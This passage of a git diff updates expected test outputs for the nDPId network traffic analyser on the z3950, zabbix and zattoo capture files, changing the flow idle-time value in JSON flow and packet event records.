+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1625070123680,"flow_last_seen":1625070196998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1625070196998,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}} +00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1625070123680,"flow_last_seen":1625070200217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":411,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1625070200217,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","packets-captured":31,"packets-processed":31,"total-skipped-flows":0,"total-l4-data-len":4562,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1625070200217} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 31/31 diff --git a/test/results/zabbix.pcap.out b/test/results/zabbix.pcap.out index 3ba208ceb..4ec962d29 100644 --- a/test/results/zabbix.pcap.out +++ b/test/results/zabbix.pcap.out @@ -1,11 +1,11 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"zabbix.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1572254070608} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA85AdAAEAGTujAqENiwKhDGd9KJ0JwAdHUAAAAAKACchAH+wAAAgQFtAQCCAorwjXTAAAAAAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572254070608,"pkt":"OjUSPEK7RoQclwmZCABFAAA8AABAAEAGMvDAqEMZwKhDYidC30pw8XhkcAHR1aAScSDKPwAAAgQFtAQCCAorfUX3K8I10wEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA05AhAAEAGTu\/AqENiwKhDGd9KJ0JwAdHVcPF4ZYAQAOUH8wAAAQEICivCNdQrfUX3"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1572254070608,"flow_last_seen":1572254070614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1572254070614,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572254070608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA85AdAAEAGTujAqENiwKhDGd9KJ0JwAdHUAAAAAKACchAH+wAAAgQFtAQCCAorwjXTAAAAAAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572254070608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572254070608,"pkt":"OjUSPEK7RoQclwmZCABFAAA8AABAAEAGMvDAqEMZwKhDYidC30pw8XhkcAHR1aAScSDKPwAAAgQFtAQCCAorfUX3K8I10wEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572254070608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA05AhAAEAGTu\/AqENiwKhDGd9KJ0JwAdHVcPF4ZYAQAOUH8wAAAQEICivCNdQrfUX3"} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1572254070608,"flow_last_seen":1572254070614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1572254070614,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-data-len":39,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1572254070614} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 diff --git a/test/results/zattoo.pcap.out b/test/results/zattoo.pcap.out index 86fc9da1f..2be1d6195 100644 --- a/test/results/zattoo.pcap.out +++ b/test/results/zattoo.pcap.out @@ -1,18 +1,18 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"zattoo.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614851148233} -00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614851148233,"flow_last_seen":1614851148233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614851148233,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614851148233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148233,"pkt":"5kBKB+riApXG95NLCABFAAAw4ZkAAIAGAAAKZQACCmYAAgtyAbsk8\/zrAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614851148234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148234,"pkt":"ApXG95NL5kBKB+riCABFAAAw4ZMAAH8GRWYKZgACCmUAAgG7C3Ik9AFrJPP87HASgAGZ0wAAAgQFtAMDAQA="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614851148234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614851148234,"pkt":"5kBKB+riApXG95NLCABFAAAo4ZoAAIAGAAAKZQACCmYAAgtyAbsk8\/zsJPQBbFAQgAEU6QAAAAAAAAAA"} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148233,"flow_last_seen":1614851148234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1614851148234,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01364{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614851148233,"flow_last_seen":1614851148235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1072,"flow_tot_l4_payload_len":1185,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1614851148235,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"5ea8fd3044cb27a1d12e476d60e0668c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Jose, O=Spirent Communications Inc., OU=IT, CN=www.spirent.com","subjectDN":"C=US, ST=California, L=San Jose, O=zattoo.com, OU=Marketing, CN=zattoo.com","fingerprint":"A8:F3:C0:1B:32:F1:73:F3:11:90:A0:01:3E:1B:3E:D5:0C:00:EB:D2"}} -00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAw4b4AAIAGAAAKZQACCmYAAgt4AFAk9NudAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148248,"pkt":"ApXG95NL5kBKB+riCABFAAAw4bcAAH8GRUIKZgACCmUAAgBQC3gk9N+yJPTbnnASgAHePQAAAgQFtAMDAQA="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAo4b8AAIAGAAAKZQACCmYAAgt4AFAk9NueJPTfs1AQgAEU6QAAAAAAAAAA"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"},"http": {"hostname":"zattosecurehd2-f.akamaihd.net","url":"zattosecurehd2-f.akamaihd.net\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:6.0) Gecko\/20100101 Firefox\/6.0"}} -00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1614851148233,"flow_last_seen":1614851148238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1165,"flow_tot_l4_payload_len":3626,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"}} -00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1614851148248,"flow_last_seen":1614851148254,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":961,"flow_tot_l4_payload_len":8045,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"}} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614851148233,"flow_last_seen":1614851148233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614851148233,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614851148233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148233,"pkt":"5kBKB+riApXG95NLCABFAAAw4ZkAAIAGAAAKZQACCmYAAgtyAbsk8\/zrAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614851148234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148234,"pkt":"ApXG95NL5kBKB+riCABFAAAw4ZMAAH8GRWYKZgACCmUAAgG7C3Ik9AFrJPP87HASgAGZ0wAAAgQFtAMDAQA="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614851148234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614851148234,"pkt":"5kBKB+riApXG95NLCABFAAAo4ZoAAIAGAAAKZQACCmYAAgtyAbsk8\/zsJPQBbFAQgAEU6QAAAAAAAAAA"} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148233,"flow_last_seen":1614851148234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1614851148234,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01364{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614851148233,"flow_last_seen":1614851148235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1072,"flow_tot_l4_payload_len":1185,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1614851148235,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"5ea8fd3044cb27a1d12e476d60e0668c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Jose, O=Spirent Communications Inc., OU=IT, CN=www.spirent.com","subjectDN":"C=US, ST=California, L=San Jose, O=zattoo.com, OU=Marketing, CN=zattoo.com","fingerprint":"A8:F3:C0:1B:32:F1:73:F3:11:90:A0:01:3E:1B:3E:D5:0C:00:EB:D2"}} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614851148248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAw4b4AAIAGAAAKZQACCmYAAgt4AFAk9NudAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614851148248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148248,"pkt":"ApXG95NL5kBKB+riCABFAAAw4bcAAH8GRUIKZgACCmUAAgBQC3gk9N+yJPTbnnASgAHePQAAAgQFtAMDAQA="} 